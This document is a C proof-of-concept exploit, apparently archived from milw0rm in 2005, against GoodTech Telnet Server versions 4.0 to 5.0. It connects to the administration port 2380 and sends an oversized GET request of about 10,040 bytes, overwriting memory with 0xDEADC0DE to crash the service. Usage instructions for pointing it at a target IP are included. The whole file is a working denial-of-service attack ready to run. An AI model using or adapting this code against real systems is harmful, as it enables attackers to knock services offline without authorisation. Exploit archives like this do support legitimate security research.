/******************************************************************************************
GoodTech Telnet Server Buffer Overflow Crash POC
created by Komrade
e-mail: unsecure(at)altervista(dot)org
web: http://unsecure.altervista.org
Tested on GoodTech Telnet Server versions 4.0 - 5.0 (versions prior to 5.0.7)
on a Windows XP Professional sp2 operating system.
This exploit connects to the Administration server of GoodTech Telnet Server
(default port 2380) and sends a very long string (10040 bytes).
After the exploit is sent the Telnet Server will crash, trying to access
to a bad memory address: 0xDEADCODE.
Usage: gtscrash.exe "IP address"
Options:
"IP address" The IP address of the computer running GoodTech Telnet Server
*******************************************************************************************/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
int main(int argc, char **argv)
{
SOCKET sock;
struct sockaddr_in sock_addr;
WSADATA data;
WORD p;
p=MAKEWORD(2,0);
WSAStartup(p,&data);
int i, n, err;
unsigned char *mex;
char risp[4096];
printf("------------------------------------------------------------------------------\r\n");
printf("\tGoodTech Telnet Server Buffer Overflow Crash POC\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");
printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n");
printf("------------------------------------------------------------------------------\r\n\r\n");
if (argc < 2){
printf("Usage: gtscrash.exe \"IP address\"\r\n\r\n");
printf("Options:\r\n");
printf("IP address\tThe IP address of the computer running GoodTech Telnet Server\r\n");
exit(0);
}
mex =(unsigned char *) LocalAlloc(LMEM_FIXED, 12000);
sock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_family=PF_INET;
sock_addr.sin_port=htons(2380); /* Administration web server port */
sock_addr.sin_addr.s_addr= inet_addr(argv[1]);
err = connect(sock,(struct sockaddr*)&sock_addr,sizeof(struct sockaddr));
if(err<0){
printf("Unable to connect() to %s\n", argv[1]);
exit(-1);
}
strcpy (mex, "GET /");
for(i = strlen(mex); i < 10032; i++)
mex[i]= 'a';
mex[i]=0;
strcat(mex, "\xDE\xC0\xAD\xDE"); /* Invalid IP address */
strcat(mex, "\r\n\r\n");
printf("Sending %d bytes.....\n\n", strlen(mex));
n=send(sock, mex , strlen(mex), 0);
n=recv(sock, risp, sizeof(risp), 0);
if (n < 0)
printf("GoodTech Telnet Server succesfully crashed!!\n");
else{
risp[n]=0;
printf("%s\n", risp);
}
closesocket(sock);
WSACleanup();
return 0;
}
// milw0rm.com [2005-03-15]